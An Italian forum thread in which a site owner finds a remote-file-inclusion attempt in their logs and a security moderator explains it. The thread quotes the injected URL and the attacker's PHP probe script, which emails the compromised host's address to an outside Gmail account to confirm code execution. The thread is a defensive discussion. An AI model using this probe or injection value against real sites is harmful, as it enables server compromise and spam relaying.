Visualizzazione dei risultati da 1 a 2 su 2
  1. #1

    Passaggio variabili php

    Salve

    mi serve un aiuto per capire cosa è successo.

    Semplificando, nel sito, ho 2 pagine PHP che si richiamano tramite metodo POST, viene passata una variabile K che contiene una stringa fatta di soli numeri.
    Le stringhe vengono memorizzate per calcoli statistici.
    Analizzando gli accessi mi trovo il seguente valore anomalo:

    K=http://swiatodziezy.com/libraries/inside.txt?

    e se ci clicco mi appare il contenuto del file di testo:

    Codice PHP:
    <?php
    //=================================
    //
    //    scan - [RiCArDiM] - inb0x hotmail v1.0
    //
    //  
    //      
    //
    //
    //     priv8 file
    //=================================
    //
     
    ini_set("max_execution_time",-1);
     
    set_time_limit(0);
     
    $user = @get_current_user();
     
    $email "$user";
     
    $assunto "dkfft";
     
    $email1 "kazzu.237@gmail.com";
     
    $headers .= "From:dkfft.com<$email>\r\n";
     
    $html '=p';

    $headers  "MIME-Version: 1.0\r\n";
    $headers .= "Content-type: text/html; charset=iso-8859-1";

     if(
    mail($email1$assunto$html $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'], $headers)){
     echo 
    "Opa spamei";
     exit();
     }
     else{
     echo 
    "Opa";
     exit();
     }
    ?>

    Sicuramente hanno cercato di fare qualcosa... avete idea di cosa?

    Grazie per eventuali suggerimenti

  2. #2
    Moderatore di Sicurezza informatica e virus L'avatar di Habanero
    Registrato dal
    Jun 2001
    Messaggi
    9,782
    probabilmente hanno testato una remote inclusion... se l'inclusione avesse avuto successo l'attaccante avrebbe ricevuto una mail (vedi codice richiamato esternamente)... confermando la possibilità di inviare spam dal tuo sito.

    In realtà se un sito è vulnerabile a RFI è totalmente compromesso... significa dare ad altri la possibilità di eseguire codice PHP arbitrario nel contesto del proprio spazio web
    Ultima modifica di Habanero; 09-10-2013 a 16:06
    Leggi il REGOLAMENTO!

    E' molto complicato, un mucchio di input e output, una quantità di informazioni, un mucchio di elementi da considerare, ho una quantità di elementi da tener presente...
    Drugo

Tag per questa discussione

Permessi di invio

  • Non puoi inserire discussioni
  • Non puoi inserire repliche
  • Non puoi inserire allegati
  • Non puoi modificare i tuoi messaggi
  •  
Powered by vBulletin® Version 4.2.1
Copyright © 2025 vBulletin Solutions, Inc. All rights reserved.